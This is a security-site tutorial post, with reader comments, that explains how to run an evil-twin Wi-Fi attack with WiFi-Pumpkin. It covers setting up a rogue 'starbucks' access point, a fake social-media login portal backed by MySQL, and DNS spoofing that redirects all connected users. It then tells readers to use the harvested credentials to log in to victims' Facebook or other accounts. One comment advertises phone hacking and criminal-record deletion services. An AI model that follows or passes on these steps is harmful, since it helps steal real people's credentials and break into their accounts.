MITM – Hacking With WiFi-Pumpkin

December 30, 2016 | Views: 28566

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

MITM – Hacking With WiFi-Pumpkin

Hi, welcome to “man in the middle” hacking with Wifi-Pumpkin tutorial:

This tutorial will show you how to get user credentials (social media credentials) using a tool called Wifi-Pumpkin on ParrotSec with a custom fake login page. Following hacks has been tested with ParrotSec (Linux operating system for pentesting) with Wifi-Pumpkin tool. You can also use Kali Os as the operating system for this hack to work.

Here are the links for Parrotsec and Wifi-Pumpkin

Besides the application, you also need to make sure that you have an external wifi card that supports AP (access point) mode. I would recommend TP-Link WN722N. This wifi card has been proven to work with all sorts of wifi attacks. So for example if you are performing this attack at a “Starbucks” your internal wifi card will be connected to their wifi and your external card will be used for attack as the Rogue AP.

What this tutorial will not cover is the installation process of ParrotSec Os or Kali Linux Os. Please find the installation documentation at their respective websites. Parrotsec can be installed as VMware or as the main operating system. The choice is entirely up to you. Please note that you must have some knowledge on VMware and Linux operating system.

I will assume you have either Kali or ParrotSec running, next, we need to install Wifi-Pumpkin. The installation for this tool is really straight forward. Type this command in your terminal:

 git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
 cd WiFi-Pumpkin
 ./installer.sh –install

If you do run into some errors while installing, please refer to their website for a solution. The reason for incomplete installation could just be that your Linux is missing some of its dependencies.
Once the installation process completes, run it at the terminal “sudo wifi-pumpkin“.  A beautiful Gui application pops-up. All your hacking is done right here. You don’t need to open any other terminal and run painstaking commands to make it work.

Wifi-Pumpkin comes withs loads of modules and plugins. For this specific tutorial, I will be concentrating on Rogue AP, Phishing Manager module and DNS Spoof module.
Before we start hacking with this awesome tool, there are few more things that we need to do. That is we need to download the custom fake-portal from fake-portal. Download and unzip the files to your web server folder, which is normally under /var/www or /var/www/html.

Next, we need to make sure our Mysql has the right database and tables to reflect the fake-portal. Mysql and Apache usually comes pre-installed in Kali and Parrotsec. If not you can follow the installation procedure on my fake-portal link.

Open terminal and type “mysql -u root” , now you will be in MySQL console. Next, we need to create a database so type “create database rogue_AP;” and enter. The name rogue_AP can be anything you want. Just make sure you write it down somewhere for later use. We need to change to the current database which we just created. So type “use rogue_AP;“. Next we need to create the correct tables, so type “create table social_login(socialn varchar(64), email varchar(64), userpassword varchar (64));
That’s it for MySQL setup just make sure you run the above commands without the “double quotes“. Next, we need to edit a file which we unzipped to var/www/html . Open up the file named “dbconnect.php” and edit this part:

$host=”localhost“;  (this is normally localhost)
$username=”your mysql username“;  (your MySQL username, default is root)
$password=”your mysql password“;  (your MySQL password)
$db_name=”rogue_AP“;  (the database name which you created)
$tbl_name=”social_login“;  (leave this as default)

Once done start MySQL with this command, “sudo /etc/init.d/mysql restart”

*Please note if you have not set your MySQL root password, please set it first. You can follow this guide to set it up.

https://ubuntu.flowconsult.at/en/mysql-set-change-reset-root-password/

A brief introduction on WiFi-Pumpkin

Wifi-Pumpkin is basically an MITM tool. The victim will connect to rogue ap and once connected, a victim will see a fake portal. In this fake-portal victim will be tricked in to logging in with their social media accounts in order to use so-called “free internet”.

Take note that this database does not in any way actually connects to the actual social media sites, hence there is no way verify whether their captured credentials are real or not. The only way to verify is to use the captured credentials and use it to login on the respective social media accounts.

Now that everything is setup and ready to go, launch wifi-pumpkin. In the “settings” menu set your “Gateway” ip address (your router ip) , set “SSID” name to whatever you like, for example, “starbucks“. Choose your available network adapter wlan0 or wlan1. Set class IP range address. If your current network uses a class C range, then make sure the range you select is not the same as your current network range. Save settings.

Under “plugins” menu untick enable proxy server. Start the access point by clicking Start. Next, go to “modules” and select “phishing manager“, under options select set directory. Set ip address to 10.0.0.1.
SetEnv Path” will be the fake portal files which you unzipped to /var/www/html and start server.

Next go to “modules” under “DNS::spoof” remove any URL in there by right clicking, clear all. Select redirect traffic from all users, and start the attack. Next under “view” select “monitor “NetCreds” and click capture logs.
When victim connects to the rogue ap, you will see the login credentials here, and also at the main panel under “activity-monitor“.

And that’s it! once down stop all servers. Use the captured credentials to try to login to a social media account like Facebook or others, depending on what the victim selected under the fake portal.

Wifi-Pumpkin is an excellent tool for MITM,well-maintained app compared to mana-toolkit or any other MITM app out there. Try out other plugins and modules in there and start learning and hacking!

Good Luck.


Like this article? Try this one, “Evil Twin Access Point | Wifi-Pumpkin

Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterGoogle+LinkedInEmail
Ready to share your knowledge and expertise?
34 Comments
  1. For those who are interested in a complete video tutorial, please visit :

    https://www.youtube.com/watch?v=mnwiKlxEud0

  2. Followed the tutorial but when I start server I get failed to listen to 10.0.0.1:80 (reason: Cannot assign requested address.) Any help please mate.

  3. First of all, thanks for the great post Knightblood.

    I am having an issue with the Phishing Manager.

    My fake AP is working well, I can connect to it with my phone and I am able to use the internet. I then start up the DNS Spoofer, placing my gateaway IP in the ‘gateway’ box and it redirects to whichever IP I request it to. I also get updates of website I have tried to connect to in the ‘DNS::Requests’ in the DNS Spoofer.

    Now, when I put the same IP address in Phishing Manager, the internet stops working and ‘This site can’t be reached’ appears on any site I try to visit on my phone.

    I have tried changing the port but it hasn’t made any difference so I put it back to 80. There are no errors appearing in the terminal nor in the phishing manager ‘requests’ box. I have tried various IP address’s and switched between the ‘index.html’ and ‘set directory’ options but still no luck.

    Can you think of what could be causing this problem and advise on how to fix it?

    Thanks in advance,

    H

    • hi , are you trying to view an https website? this tutorial will not work if you are trying to visit a http website, it will not display any page.

      On the other hand i’ve done a complete video tutorial ( 6 part video tutorial ) which will be up soon. I will update it soon once it’s up. You should be able to follow the tutorial and get it running.

  4. Are you worried your partner might be cheating on you? I know of a friend who used the service of an investigative firm she hired online and was able to get all the facts she had been yearning to get in months within a couple of days. Funny thing was, she just saw their email (INCFIDELIBUS at Gmail dot com) on an online forum and the puzzle was solved for her. They also fix credit scores, delete criminal records, hack mobile phones and many more. Just send an email stating what you need them to get done for you..

Page 4 of 4«1234
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Cybrary On The Go

Get the Cybrary app for Android for online and offline viewing of our lessons.

Get it on Google Play
 

Support Cybrary

Donate Here to Get This Month's Donor Badge

 
Skip to toolbar

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel